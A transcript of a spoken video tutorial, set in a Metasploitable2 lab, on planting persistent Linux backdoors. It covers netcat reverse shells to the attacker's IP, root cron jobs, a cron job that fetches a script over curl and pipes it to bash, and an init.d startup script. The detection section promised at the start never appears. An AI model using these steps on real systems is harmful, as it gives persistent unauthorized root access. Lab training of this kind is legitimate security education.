sure my hair is good. Alright, we're ready to go. Alright, I really do have a good video for you guys today. So I've been working on this for like the past hour, testing things out. So what we're going to be doing has to do with the creation of custom backdoors as well as the detection of these backdoors. Now we are starting off very, very basic, and that's okay, because you want to understand the basics before you move into the advanced. Very important that you understand the basics and you build off of the basics. In the future, near future, distant future, we will get into much more advanced ways of doing some of the things that we're going to do today. We are going to be using Kali Linux as our attack box. We're going to continue to use the wonderful Metasploitable2 that is running inside of a virtual machine as our target. We're going to assume that we have already gained access to the target, and we want to insert a custom backdoor, and then we're gonna try to add persistence to that backdoor so that if we lose access to the system, we're able to get back into the system via that persistent backdoor. And then finally, we're gonna look at basic ways that we could possibly detect this backdoor. And we have our Metasploitable2 machine right here. It's running inside our virtual box, as is Kali Linux. For this video, we are assuming that we have already somehow gained that access, and we have been able to gain access several different ways if you've watched the previous videos that I have made under the Metasploitable2 playlist. So there are just numerous ways that we would have legitimately gained access to this box. For this demo, I'm just going to quickly access the box using SSH. To access this box via SSH, there is a pretty lengthy command that you have to type. I will include this in the description for anybody following along so you can copy and paste, because the target box is using an outdated algorithm. You know, we have to add on all of these extra flags for our SSH command, and obviously to do this you will need the IP address for your target box, which will surely be different than the one that I have for mine. And if you see at the end of this command, we are just logging in as the unprivileged user of msfadmin at the IP address of the box. And we know that the password is also msfadmin, and we are now logged in to Metasploitable2. So if I run the who am I command, we are logged in as msfadmin. If I run the ID command, we are not root, but we do have the ability to use sudo in front of all our commands. So essentially, we can run commands as a root user. All right, so let's very quickly just summarize what our definition of a Linux backdoor is. A Linux backdoor is a means of gaining access, unauthorized access, to a Linux system. It can be used by attackers to control that system and to do so remotely. You can steal sensitive information and launch further attacks. We are not doing any of those because we are ethical hackers. So we are doing this to learn and understand how this works, and ultimately to be able to better detect it and defend against it. There are many different types of backdoors. We are not even scratching the surface when it comes to this topic. But our backdoor is going to be very basic, very simple, because as I said, we want to start off with the basics before we move on to advanced stuff. So one of the main things that we're going to use for this backdoor is the wonderful netcat utility, which is installed on basically every Linux system by default. If I do a what is on NC, this is the TCP IP Swiss Army knife. As you can see, it is installed on the Metasploitable2 box. Whoa, hold up. I gotta text this girl real quick. Okay, sorry about that. I'm trying to find a girlfriend, man. It's hard. Alright, so this is what we're going to do. We're going to progress through this, starting with the classic, simple backdoor using netcat. Netcat is a very powerful utility. We do a what is on netcat. We get back that it is a TCP IP Swiss Army knife. Netcat and NC are essentially the same thing. Alright, so in its most simple form, to understand the concept, let's start with creating a listener on the attacker's machine and then on the target machine using netcat to make a reverse connection back to the attacking machine. So in another tab, we're on our Kali Linux system. We're going to set up a listener using netcat. We're going to do -nvlp and we're going to specify a port number. This can be any port. I'm choosing 4444 just because it is somewhat of a tradition when it comes to Metasploit interpreters and so forth. You can use any number that you want, as long as it's not in use. So we've started up a listener on the Kali Linux, aka the attacker's system, on port 4444. Now over on the target machine, we're going to also use netcat, and we're going to make a reverse connection back to the attacker's machine. We're going to run netcat, specify the IP address of the attacker's machine. So we will quickly grab that by running ifconfig. Specify the port of 4444. We're going to do a -e and then /bin/bash and hit enter. So now over on the Kali Linux machine, you see that we have an incoming connection, and we have a very, very dumb terminal. We don't have a prompt or anything, but we now have a connection between the attacker machine and the target machine. So if I run the whoami command, you see that we are now MSF admin. If I run the ID command, those are the groups that this user belongs to, and we can continue to run various commands that you would typically run. There you go, the most simple way of doing this. Now let's progress into something a little bit more advanced. So what happens if this connection is broken? Then we have to repeat the process. This is not reliable. There's absolutely no persistence. Over on the target box, if we hit Control-C, the connection is broken. Right? So that's not going to work long term. So let's add some persistence to this. So back on the Kali Linux machine, we're going to start our listener back up again. And then over on the target machine, Metasploitable2, we're going to create a cron job. Cron jobs are something that allows you to automate tasks on Linux systems. You can set cron jobs to run every minute, every hour, every day, once a year. There's so many different ways that you can use them. And there are also cron jobs that pertain to a specific user, or they can be system-wide. So we are going to create a cron job that is system-wide, and that is going to be located inside of /crontab. Alright, so if I cat out the contents of /crontab, you will see that there currently is nothing inside of it. We're going to drop into a root shell by running sudo with -s. We are now the root user, and we are going to take that same command and we are going to create a cron job with it so that it runs every single minute. So to do that, we are going to use echo. We are going to echo the command into the etc crontab file. So inside of double quotation marks, we will insert the command. We're going to have to add a couple things to this. Okay, so I'm going to copy and paste the first part of this in. So the first part of this consists of some asterisks that are spaced out accordingly, and what those asterisks do is basically tell the scheduler to run the command that we are about to provide it with, to run that command every single minute of every single hour of every single day, and so on. And it is going to run it as the root user. And the command that we are going to have it run is going to be that same netcat command that is going to be made back to our attacker machine. Netcat followed by the IP address of our Kali Linux machine. And we are using port 4444. And finally the -e followed by /bin/bash. We are echoing this command or this string into /etc/crontab. Now if I cat out the contents of etc/crontab, you see we now have everything inside of it. Once again, here are the asterisks pertaining to the scheduling of the command. It's running as root, and this is the actual command right here. No different than the first time that we did this in the structure or the syntax of the command. All right, so this is already ready to go. This is going to run every minute. So back on our Kali Linux machine, we have our listener open, and we're just waiting for a connection. And there we go. So it has made a reverse connection back to us, and once again we have access to the machine. Now the big difference between this way of doing it and the first way is that if our connection gets terminated, we send a bad command, whatever the case may be, we know that this is going to run every single minute. So as long as the cron job is not found, we essentially have a backdoor with persistence. So once again, if I run who am I, and the other difference is that we are root. We are root now as well. So we have gained backdoored access to the machine with persistence as the root user, and we can run commands on the system. Now, if you are interested in upgrading from the dumb shell, as they call it, to a pseudo terminal, then you're going to need to know a little bit of Python. And if you're doing this sort of thing that we're doing here, you should know this anyway. Even if you don't know Python, there are some basic things with Python that every person should know that is engaged in ethical hacking, red teaming, etc. and so forth. So I will include all these commands in the description, but I'm just going to paste this in to save some time. And this is just a little bit of Python. What this is going to do is this is going to upgrade to a pseudo terminal. It gives us just a little bit more functionality. If I hit enter, you now see that we actually have a prompt. We have the pound symbol designating that we are the root user. And now if we run ls, it even looks a little bit different. It puts it in columns. We cd into the root directory and run ls. It's beginning to look a little bit more like a typical Linux system. Alright, so now we're gonna take things just a little bit further, and we're gonna do essentially the same thing, but in a way that is just a little bit fancier, for lack of a better word. And it'll give you a different understanding of how this sometimes is implemented. Alright, so I'm going to remove this cron job. I'm going to do that by simply echoing a blank space into the file. That is going to essentially remove our persistent backdoor that we're not doing the best job of hiding anyway. Okay, so now if I cat out etsy crontab, you see that there's nothing in it. And I'm going to exit, terminate the connection on our attacker box. Alright, so for this example, I'm going to stick to the cron job. There's different ways that we could do this. You could add a similar command to the user's .bashrc file, but we'll just stick to the cron job because it's reliable, it works. I'm not going to deviate from that. Alright, so we're going to create another cron job, but this time it's just going to be a little bit more fancier. So I'm going to use the echo command, and inside of double quotation marks I'm going to paste in what I want to be added to the cron job, and then once again we will redirect that into etsy/crontab. And what I'm going to paste inside of these double quotation marks looks like this. So once again we have our asterisk. It is going to run every minute, every hour of every day, etc. and so forth. It's going to run as the root user, but this time what we're doing is we are going to have it run a curl command, and then that curl command is going to reach out to our attacker box at the IP address that the attacker box has been given. So let's go ahead and copy that. Paste that in, and this is going to be on port 8080. So what is happening is it's going to use the curl command. It's going to reach out to the attacker box at the IP address of the attacker box on port 8080, and it's going to attempt to grab a file called shell, and then it's going to pipe that into bash and run it. So over on our Kali Linux machine, we're going to create a very basic shell script called shell. We're going to put in our shebang /bin/bash, and we're just going to add one line to this, and it is going to essentially be the same line that we used in the last example. So we're going to run the netcat command. We're going to do the IP address of the Kali Linux machine, port 4444-E/bin, and this time we're going to do /bin/bash. Control X, Y. Alright, now we're going to use Python 3, and we're going to start up an http server using Python 3. We're starting it inside the directory in which the bash script exists. So it's Python 3 with -m http.server, and we're doing this on port 8080. So now we have a makeshift web server that we have stood up on our attacker machine, and once again, in another tab, we're going to start up a netcat listener back on port 4444 to wait for an incoming connection. And this time the cron job is going to run every minute, but instead it's going to make a curl request over to our attacker machine. We'll see that curl request come in real time, and then once it comes in, it will be grabbing that bash script, it will be running it on the target machine, and then it will make the reverse connection again. So just a different way, a more elaborate way of doing this. It definitely is adding complexity, and if this were a real world situation, there would be layers of evasion, obfuscation, etc. And the whole goal would be to try to make it much harder to detect. Okay, so we have our web server running. We have our netcat listener up and running. Now we're going to hit enter and essentially add the cron job, schedule the cron job, and then we're simply waiting for it to run, which should be about a minute. So over here, we can just sit and wait here for a second, and we will see the connection being made in real time. There'll be a log that gets generated and printed to the screen. And there we go. So it just reached out to our attacker machine using curl. It made a GET request. We have a status code of 200. You can see that it used HTTP, and it was made from this IP address. So now over here on our listener has received the reverse connection, and we once again have access back to the system. And if we get disconnected for some reason, we know that this is going to run every minute. So we have access to the system. We have a certain degree of persistence. If we want to upgrade our shell, we can do that once again by using that Python one-liner, and now we have an upgraded shell. Root user, etc. and so forth. Okay. If for any reason I hit the wrong command, in this example I did a Control-C, I terminated the connection entirely. Because this is running every minute, I'll just start up my listener again, and we'll wait for the connection. Once you have done this once, you no longer need to have your Python web server running, so you can Control-C from that. Alright, so for the last example, we are going to create a service that is running on our target machine, Metasploitable2. And this service is going to be a startup script. So every time the target machine starts up or is rebooted, it will make that reverse connection back to our attacker box. Okay, so for this last example, we are going to actually create a startup script that will be run every time the target box, the Metasploitable2 box, starts up or is rebooted. In order to do this, you do have to understand a little bit about the system. You specifically need to know, is it using sysv-init or is it using systemd? Most systems, Debian-based systems especially nowadays, they are using systemd for all of their startup services as well as shutting down services. But this is Metasploitable2. This is old, this is outdated, so chances are it is using sysv-init instead of systemd. So a straightforward way to figure out which one it is using is going to be to run a couple commands. So we're going to run ps aux, and we're going to pipe that into head so that we get the first 10 lines. Now you see at the very top, the very first process, this is the first process initiated when this machine starts. It has a PID of 1, and that process is sbin init. Now I'm going to run ls-l on that path /sbin/init, and I'm doing that because I need to see if it has a symlink or not. So when I do that, I get back the same path, or in other words, there is no symlink. So this tells me that this is running sysv init. Let me show you what this would look like on our Kali Linux system. If I run the same command, ps aux, pipe that in the head, get the first 10 lines, you see that the very first process is /sbin/init. Now when I run ls-l on that path, we see that it has a symlink on it. So it's actually a symlink to systemd. That is how you are able to quickly determine if it's systemd or sysv init. So Kali Linux is systemd, and our Metasploitable2 box is using sysv init. That is important because that's going to tell us, it's going to basically tell us how we're going to be able to do this. So since it is using sysv init, we're going to cd inside of /etc/init.d. Inside of this directory is where we will have all of our various startup scripts for the system, as well as scripts that are run to bring services back down. So inside of this directory we see a lot of different things such as cron for cron jobs. We have scripts related to mounting things and unmounting things. Here's a script for SSH, so this probably pertains to starting up the SSH daemon when the system starts up. So if we cat out the contents of that SSH startup script and pipe that into head, we'll get the beginning of that. I'm interested in these first 10 lines or so of that startup script. If I cat out the entirety of the file, the rest of it is the actual bash script. I'm not interested in that. I want just the top information. I want the information starting from the shebang here at the very top all the way down to the edit init info. So what I did is I simply just copied this, and then over on the Kali Linux system, I created a file called Backdoor, and I pasted those first 10 lines into this file, and I'm changing some of the information. So this is functioning as a template for me, and then this is going to become our custom backdoor startup script. So the only thing that I changed, and this is, you would not actually do this in a real situation. You're not going to actually describe it as a backdoor. We're just being humorous. Obviously, this is only to learn. This is not to actually do anything like this to anybody. So the two things that I changed were provides is being referred to as a backdoor. This is the name of the service, is backdoor. And then for the description, I'm calling it a not so hidden backdoor. Other than that, everything is the same as the information that I got from the SSH startup service. And then down here at the bottom, we are going to include our command that is going to be ran every time the system starts up. And you guessed it, once again, we're going to use our tried and true netcat command. So we're going to do netcat followed by the IP address of the attack box, 192.168.56.102. We're going to do port 4444 and then -e/bin/bash. And finally, we're going to do an ampersand. So this will be run in the background. Control X and Y to save. So now we have our backdoor service file that has been created, but it is sitting on our Kali Linux attack box. So we need to get this file over to the target machine. And the way that we are going to do this is by utilizing the methods that we learned in the previous example to get this over to the target machine. So once again, using Python, we are going to start up a basic HTTP server. We're going to start this up on port 8080, and we're doing this from inside the directory where we have our backdoor service file that we want to make accessible. So the Python server is running. And now back on the attack box, we're going to go ahead and straight from the command line, no fancy way of doing this, we're just going to use curl, and we are going to quickly grab that file. So we'll run curl on the IP address of the attack box, and that is going to be on port 8080, and we are going to grab the file that is called backdoor, and we are going to redirect it into a file on our system inside of /etc/init.d that is going to also be called backdoor. So now I should have a file on the system that is called backdoor. There it is, and if we cat out the contents of that, we have the contents of the backdoor file. We're going to go ahead and make this script executable by running chmod +x on backdoor. If we do an ls-l on that, it has the correct permissions. To add our startup script to the startup sequence, we run the command update-rc.d with the name of the script or service, which is backdoor, and we're going to run this with defaults. Now I've already done this, so you see that it's saying that it does already exist. I had to make sure that it worked before I made the video, otherwise I'll be stumbling through it. Alright, so our service exists, it has been added to the startup sequence. Now we're going to shut down the Metasploitable2 box and restart it, and when it starts back up it should make a reverse shell. We should have a reverse shell on our Kali Linux attacker box. So I'm going to go ahead and exit out of that, come up here, shut this down, power off the machine. We don't need our Python server running anymore. Alright, so what we're going to do first is we're going to start up our netcat listener. And now we're going to start back up Metasploitable2. Few moments we should catch a shell on our Kali Linux machine once those startup scripts begin to run. And there we go. So the connection has been made, and we now once again have a shell on Metasploitable2. If I run the whoami command, we are root. We have a root shell into the box. Every single time the Metasploitable2 box is started up again or restarted, we're going to have access to the box. Every single time that the Metasploitable2 box reboots, we will once again have a root shell on the machine. And it should be becoming very repetitive by now. That's the point. If you want to upgrade your shell, go ahead and paste in your Python command. As always, if you haven't done so already, please, please, please stop what you are doing right now. If you're still watching this video and you have not subscribed to my channel, really, what are you doing right now? Please subscribe to the channel, help me out. I have no friends, but I'm trying to have a lot of subscribers. So if you could, please just help me out with that. It would really mean a lot to me. And as always, keep learning and stay fresh. Definitely see you in the next video.
Fresh forensics.